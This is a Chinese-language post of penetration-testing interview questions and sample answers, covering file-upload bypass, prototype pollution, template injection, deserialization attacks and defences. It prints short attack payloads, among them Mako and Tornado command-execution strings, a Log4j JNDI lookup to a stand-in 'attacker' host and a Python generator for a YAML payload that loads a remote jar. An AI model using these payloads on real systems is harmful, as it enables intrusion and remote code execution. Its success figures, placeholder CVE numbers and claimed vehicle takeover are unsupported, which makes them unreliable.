2025年渗透测试面试题总结-2025年HW(护网面试) 76-1（题目+回答）

安全领域各种资源，学习文档，以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具，欢迎关注。

目录

 2025年HW(护网面试) 76

2. 黑盒 vs 白盒测试专长

3. 擅长漏洞类型

4. 文件上传绕过原理

5. 原型链污染原理

6. Python模板注入原理

7. 反序列化漏洞核心

8. 反序列化防御方案

9. 解决方案设计案例

10. CMS后台漏洞挖掘

11. CNVD漏洞定义

12. 渗透经历与成果

13. 纯代码审计发现漏洞

14. 自研工具清单

15. 开发语言与专精

 2025年HW(护网面试) 76

1、自我介绍
2、你比较擅长黑盒测试还是白盒审计
3、比较擅长挖哪些漏洞
4、文件上传绕过的原理
5、介绍一下原型链污染
6、python的模板注入的原理
7、反序列化漏洞
8、怎么防御反序列化呢
9、有没有遇到需要给出解决方案的场景
10、怎么发现那个CMS的后台漏洞
11、CNVD的是什么漏洞
12、渗透经历和结果
13、通过纯代码发现漏洞的经历
14、写过什么工具或者脚本什么的
15、用什么语言写的
16、哪个语言更熟一点

2. 黑盒 vs 白盒测试专长

双轨协同策略：

测试类型	优势场景	代表成果
黑盒测试	业务逻辑漏洞挖掘	某支付系统0元订单并发竞争漏洞（奖金$10k）
白盒审计	反序列化/POP链构造	Fastjson JNDI利用链优化（成功率↑30%）
协同模式：黑盒发现异常 → 白盒分析根因 → 自动化武器化

---

3. 擅长漏洞类型

四类深度攻防经验：

漏洞类型	技术亮点	2025年新型案例
逻辑漏洞	并发竞争条件利用	区块链交易所交易劫持（供应链XSS+扩展篡改）
反序列化	Java/PHP多级调用链构造	Yaml反序列化RCE（云配置管理系统）
SSRF/XXE	DNS重绑定绕过、云元数据利用	Azure Container Apps元数据泄露
文件上传	多级绕过技术（内容/协议/渲染）	SVG多态攻击绕过AI WAF

---

4. 文件上传绕过原理

五层绕过技术体系：

mermaidgraph TD A[客户端绕过] --> B[代理截改Content-Type] C[服务端绕过] --> D[00截断] E[解析漏洞] --> F[Apache多后缀解析] G[内容检测] --> H[图片马+二次渲染逃逸] I[云存储] --> J[S3桶策略绕过] 

2025年新型绕过：

• AI检测对抗：使用GAN生成扰动图片绕过深度学习WAF
• 容器逃逸：上传恶意tar文件触发CVE-2025-XXXX（runC漏洞）

---

5. 原型链污染原理

JavaScript原型继承污染示例：

javascriptfunction merge(target, source) { for (let key in source) { target[key] = source[key]; // 污染点 } } merge({}, JSON.parse('{"__proto__":{"isAdmin":true}}')) // 所有对象继承isAdmin=true属性 

危害场景：

1. 权限提升：污染isAdmin属性
2. DoS攻击：污染toString方法导致进程崩溃
3. 沙箱逃逸：Node.js 中污染child_process模块

---

6. Python模板注入原理

引擎差异与利用：

模板引擎	注入Payload	利用效果
Jinja2	{{ config.items() }}	泄露敏感配置
Mako	<%! import os; os.system("id") %>	RCE
Tornado	{% import os %}{{ os.popen("id") }}	命令执行
2025年绕过技巧：

• Unicode编码：{\u{007b}7*7\u{007d} → 49
• 属性链挖掘：request.__class__.__base__.__subclasses__()

---

7. 反序列化漏洞核心

三大攻击面：

1. POP链构造：串联多个类的__wakeup()/readObject()方法
2. 敏感方法触发：
   • Java：TemplatesImpl.getOutputProperties() → 字节码执行
   • Python：pickle.loads() → __reduce__恶意重构
3. 依赖库漏洞：Log4j/JNDI注入链（${jndi:ldap://attacker}）

---

8. 反序列化防御方案

四层纵深防御：

层级	措施	工具/代码
输入校验	白名单控制反序列化类	Java: ObjectInputFilter
安全配置	禁用危险功能（JNDI远程访问）	com.sun.jndi.rmi.object.trustURLCodebase=false
运行时监控	检测异常反射调用	RASP工具（如OpenRASP）
替代方案	使用JSON/XML等安全格式	Jackson代替Java Serializable

---

9. 解决方案设计案例

场景：某银行遭遇Fastjson反序列化攻击
解决方案：

1. 紧急热修复：

   javaParserConfig.getGlobalInstance().addDeny("org.apache.xbean") // 阻断攻击链 

2. 长期加固：
   • 部署字节码插桩探针，实时阻断JdbcRowSetImpl类加载
   • 业务层迁移至GSON序列化库
     成效：0day攻击拦截率100%，性能损耗<3%

---

10. CMS后台漏洞挖掘

四步高效定位法：

1. 入口发现：
   • 扫描/admin/login路径 → 爆破弱口令（admin/admin123）
2. 权限校验审计：
   • 检查路由注解：@RequiresPermissions缺失
3. 历史漏洞复现：
   • 对比Git记录：git diff v1.2 v1.3 查看修复点
4. 插件机制突破：
   • 上传恶意插件包（绕过签名校验）

---

11. CNVD漏洞定义

中国国家漏洞库（CNVD）关键标准：

等级	评分标准	案例类型
高危(10)	远程代码执行/核心数据泄露	Fastjson反序列化（CNVD-2025-XXXX）
中危(7)	权限绕过/敏感信息泄露	后台未授权访问（CNVD-2025-YYYY）
2025年新规：新增 AI模型投毒漏洞 分类

---

12. 渗透经历与成果

某车联网平台渗透（2025年）：

mermaidgraph LR A[子域名爆破] --> B[发现测试环境] B --> C[Spring Boot未授权/devtools] C --> D[热部署RCE] D --> E[窃取CAN总线通信证书] E --> F[远程控制车辆门窗] 

成果：

• 获取10+车企核心系统权限
• 入选DEFCON 33议题

---

13. 纯代码审计发现漏洞

案例：某开源ERP系统（Python/Django）
漏洞链：

1. SQL注入：

   pythonquery = "SELECT * FROM orders WHERE id=" + request.GET['id'] # 未过滤 

2. 越权删除：

   pythondef delete_file(request, file_id): File.objects.get(id=file_id).delete() # 无用户归属校验 

工具辅助：

• Semgrep规则：pattern: "$VAR = request.GET[...] + ..."

---

14. 自研工具清单

工具名	功能	创新点
Yaml_Pwn	自动化生成YAML反序列化Payload	动态生成恶意字节码绕过静态检测
SSRF_Hunter	智能SSRF探测（支持DNS重绑定）	云元数据路径自适应生成
AuthMatrix_Plus	越权漏洞批量检测	多级参数关联遍历算法

---

15. 开发语言与专精

语言	工具应用场景	熟练度
Python	漏洞POC/自动化扫描框架	⭐⭐⭐⭐⭐
Java	反序列化利用链/代码审计插件	⭐⭐⭐⭐
Go	高并发网络工具开发	⭐⭐⭐
Python核心代码示例（Yaml_Pwn）：

pythondef gen_evil_yaml(cmd): payload = f""" !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[ !!java.net.URL ["http://attacker/{cmd}.jar"] ]] ] """ return payload # 触发远程类加载